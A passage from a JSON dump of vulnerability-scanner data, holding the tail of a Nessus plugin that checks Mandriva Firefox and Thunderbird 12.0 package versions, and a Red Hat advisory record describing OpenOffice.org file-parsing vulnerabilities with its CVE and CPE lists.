reference:\"firefox-id-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-is-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-it-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ja-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-kk-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-kn-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ko-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ku-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-lg-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-lt-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-lv-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-mai-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-mk-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ml-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-mr-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-nb_NO-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-nl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-nn_NO-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-nso-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-or-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-pa_IN-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-pl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-pt_BR-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-pt_PT-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ro-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ru-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-si-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sk-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sq-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sr-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sv_SE-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ta-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ta_LK-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-te-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-th-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-tr-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-uk-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-vi-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-zh_CN-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-zh_TW-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-zu-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64cairo-devel-1.10.2-4.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64cairo-static-devel-1.10.2-4.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64cairo2-1.10.2-4.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64sqlite3-devel-3.7.11-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64sqlite3-static-devel-3.7.11-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64sqlite3_0-3.7.11-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64xulrunner-devel-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64xulrunner12.0-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libcairo-devel-1.10.2-4.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libcairo-static-devel-1.10.2-4.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libcairo2-1.10.2-4.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsqlite3-devel-3.7.11-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsqlite3-static-devel-3.7.11-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsqlite3_0-3.7.11-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libxulrunner-devel-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libxulrunner12.0-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ar-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-be-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-bg-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-bn_BD-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-br-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ca-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-cs-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-da-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-de-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-el-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-en_GB-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ar-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ca-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-cs-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-de-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-el-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-es-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-fi-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-fr-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-it-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ja-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ko-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-nb-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-nl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-pl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-pt-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-pt_BR-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ru-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-sl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-sv-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-tr-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-vi-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-zh_CN-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-zh_TW-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-es_AR-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-es_ES-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-et-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-eu-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-fi-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-fr-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-fy-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ga-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-gd-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-gl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-he-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-hu-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-id-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-is-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-it-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ja-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ko-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-lightning-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-lt-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-nb_NO-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-nl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-nn_NO-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-pl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-pt_BR-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-pt_PT-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ro-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ru-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-si-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-sk-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-sl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-sq-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-sv_SE-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ta_LK-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-tr-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-uk-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-vi-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-zh_CN-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-zh_TW-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"nsinstall-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"sqlite3-tools-3.7.11-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"xulrunner-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:08:48", "description": "Updated openoffice.org packages that fix multiple security issues and\none bug are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nOpenOffice.org is an office productivity suite that includes desktop\napplications, such as a word processor, spreadsheet application,\npresentation manager, formula editor, and a drawing program.\n\nAn array index error and an integer signedness error were found in the\nway OpenOffice.org parsed certain Rich Text Format (RTF) files. An\nattacker could use these flaws to create a specially crafted RTF file\nthat, when opened, would cause OpenOffice.org to crash or, possibly,\nexecute arbitrary code with the privileges of the user running\nOpenOffice.org. (CVE-2010-3451, CVE-2010-3452)\n\nA heap-based buffer overflow flaw and an array index error were found\nin the way OpenOffice.org parsed certain Microsoft Office Word\ndocuments. An attacker could use these flaws to create a specially\ncrafted Microsoft Office Word document that, when opened, would cause\nOpenOffice.org to crash or, possibly, execute arbitrary code with the\nprivileges of the user running OpenOffice.org. (CVE-2010-3453,\nCVE-2010-3454)\n\nA heap-based buffer overflow flaw was found in the way OpenOffice.org\nparsed certain Microsoft Office PowerPoint files. An attacker could\nuse this flaw to create a specially crafted Microsoft Office\nPowerPoint file that, when opened, would cause OpenOffice.org to crash\nor, possibly, execute arbitrary code with the privileges of the user\nrunning OpenOffice.org. (CVE-2010-4253)\n\nA heap-based buffer overflow flaw was found in the way OpenOffice.org\nparsed certain TARGA (Truevision TGA) files. An attacker could use\nthis flaw to create a specially crafted TARGA file. If a document\ncontaining this specially crafted TARGA file was opened, or if a user\ntried to insert the file into an existing document, it would cause\nOpenOffice.org to crash or, possibly, execute arbitrary code with the\nprivileges of the user running OpenOffice.org. (CVE-2010-4643)\n\nA directory traversal flaw was found in the way OpenOffice.org handled\nthe installation of XSLT filter descriptions packaged in Java Archive\n(JAR) files, as well as the installation of OpenOffice.org Extension\n(.oxt) files. An attacker could use these flaws to create a specially\ncrafted XSLT filter description or extension file that, when opened,\nwould cause the OpenOffice.org Extension Manager to modify files\naccessible to the user installing the JAR or extension file.\n(CVE-2010-3450)\n\nA flaw was found in the script that launches OpenOffice.org. In some\nsituations, a '.' character could be included in the LD_LIBRARY_PATH\nvariable, allowing a local attacker to execute arbitrary code with the\nprivileges of the user running OpenOffice.org, if that user ran\nOpenOffice.org from within an attacker-controlled directory.\n(CVE-2010-3689)\n\nRed Hat would like to thank OpenOffice.org for reporting the\nCVE-2010-3451, CVE-2010-3452, CVE-2010-3453, CVE-2010-3454, and\nCVE-2010-4643 issues; and Dmitri Gribenko for reporting the\nCVE-2010-3689 issue. Upstream acknowledges Dan Rosenberg of Virtual\nSecurity Research as the original reporter of the CVE-2010-3451,\nCVE-2010-3452, CVE-2010-3453, and CVE-2010-3454 issues.\n\nThis update also fixes the following bug :\n\n* OpenOffice.org did not create a lock file when opening a file that\nwas on a share mounted via SFTP. Additionally, if there was a lock\nfile, it was ignored. This could result in data loss if a file in this\nsituation was opened simultaneously by another user. (BZ#671087)\n\nAll OpenOffice.org users are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAll running instances of OpenOffice.org applications must be restarted\nfor this update to take effect.", "edition": 27, "published": "2011-01-31T00:00:00", "title": "RHEL 6 : openoffice.org (RHSA-2011:0183)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3450", "CVE-2010-3689", "CVE-2010-4253", "CVE-2010-3451", "CVE-2010-3454", "CVE-2010-4643", "CVE-2010-3453", "CVE-2010-3452"], "modified": "2011-01-31T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-lt_LT", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nr_ZA", "p-cpe:/a:redhat:enterprise_linux:autocorr-it", "p-cpe:/a:redhat:enterprise_linux:autocorr-ja", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ms_MY", "p-cpe:/a:redhat:enterprise_linux:autocorr-ga", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-bsh", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pt_BR", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-core", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-bn", "p-cpe:/a:redhat:enterprise_linux:autocorr-sk", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-xh_ZA", "p-cpe:/a:redhat:enterprise_linux:broffice.org-math", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-mai_IN", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-bg_BG", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ss_ZA", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-zu_ZA", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-wiki-publisher", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-zh_TW", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-calc", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-it", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sk_SK", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-hr_HR", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-gu_IN", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-tn_ZA", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ja_JP", "p-cpe:/a:redhat:enterprise_linux:autocorr-zh", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-draw", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-te_IN", "p-cpe:/a:redhat:enterprise_linux:autocorr-lb", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-math", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-testtools", "p-cpe:/a:redhat:enterprise_linux:broffice.org-draw", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-gl_ES", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-dz", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ro", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sr", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-hu_HU", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-st_ZA", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ml_IN", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nl", "p-cpe:/a:redhat:enterprise_linux:autocorr-de", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-math-core", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-base-core", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-debuginfo", "p-cpe:/a:redhat:enterprise_linux:autocorr-sl", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-fr", "p-cpe:/a:redhat:enterprise_linux:autocorr-sv", "p-cpe:/a:redhat:enterprise_linux:broffice.org-brand", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-cy_GB", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-writer", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-report-builder", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-mr_IN", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-ure", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-de", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-th_TH", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-eu_ES", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ts_ZA", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-zh_CN", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-emailmerge", "p-cpe:/a:redhat:enterprise_linux:autocorr-pl", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-xsltfilter", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nso_ZA", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-da_DK", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-uk", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ta_IN", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-graphicfilter", "p-cpe:/a:redhat:enterprise_linux:broffice.org-calc", "p-cpe:/a:redhat:enterprise_linux:autocorr-lt", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pa", "p-cpe:/a:redhat:enterprise_linux:autocorr-en", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ur", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-fi_FI", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-presentation-minimizer", "p-cpe:/a:redhat:enterprise_linux:autocorr-hu", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-headless", "p-cpe:/a:redhat:enterprise_linux:autocorr-fa", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sv", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-sdk", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-as_IN", "p-cpe:/a:redhat:enterprise_linux:broffice.org-writer", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-base", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-ogltrans", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-brand", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-javafilter", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-tr_TR", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ve_ZA", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-opensymbol-fonts", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pt_PT", "p-cpe:/a:redhat:enterprise_linux:broffice.org-impress", "p-cpe:/a:redhat:enterprise_linux:autocorr-fr", "p-cpe:/a:redhat:enterprise_linux:autocorr-vi", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-or_IN", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-et_EE", 